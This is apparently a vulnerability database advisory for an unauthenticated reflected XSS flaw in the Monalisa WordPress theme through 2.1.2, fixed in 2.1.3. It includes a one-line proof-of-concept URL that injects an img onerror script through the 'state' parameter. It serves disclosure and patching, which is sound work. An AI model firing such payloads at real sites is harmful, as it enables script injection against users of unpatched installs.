Themes Vulnerabilities

Monalisa < 2.1.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Description

An Unauthenticated Reflected XSS vulnerability was discovered in the Monalisa theme through 2.1.2 for WordPress.

Proof of Concept

https://example.com/reservation/?state=1%22--%3E%3Cimg%20src=x%20onerror=(alert)(`XSS`);%3E

Affects Themes

monalisa
Fixed in 2.1.3

References

URL
https://themeforest.net/item/monalisa-hotel-resort-management-wordpress-theme/17339084
URL
https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-07-02-monalisa-hotel-resort-wordpress-theme-v2-1-2.txt

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Vlad Vector
Submitter
VLΛD VΞCTOR
Submitter website
https://vladvector.ru
Submitter twitter
vlad_vector
Verified
Yes
WPVDB ID
f5271e5b-1ef2-4d9f-b72a-c2a7d44fa249

Timeline

Publicly Published
2020-07-08 (about 3 years ago)
Added
2020-07-08 (about 3 years ago)
Last Updated
2020-07-09 (about 3 years ago)

Other

Published
Title
Published
2021-09-21
Title
Special Text Boxes < 5.9.110 - Admin+ Stored Cross-Site Scripting
Published
2023-02-15
Title
Nooz < 1.7.0 - Admin+ Stored XSS
Published
2014-08-01
Title
Better WP Security <= 3.5.3 - inc/secure.php logevent Function URL H&ling Stored XSS
Published
2024-04-16
Title
LearnPress Export Import < 4.0.4 - Reflected Cross-Site Scripting
Published
2023-03-27
Title
Greenshift < 5.0.0 - Author+ Stored XSS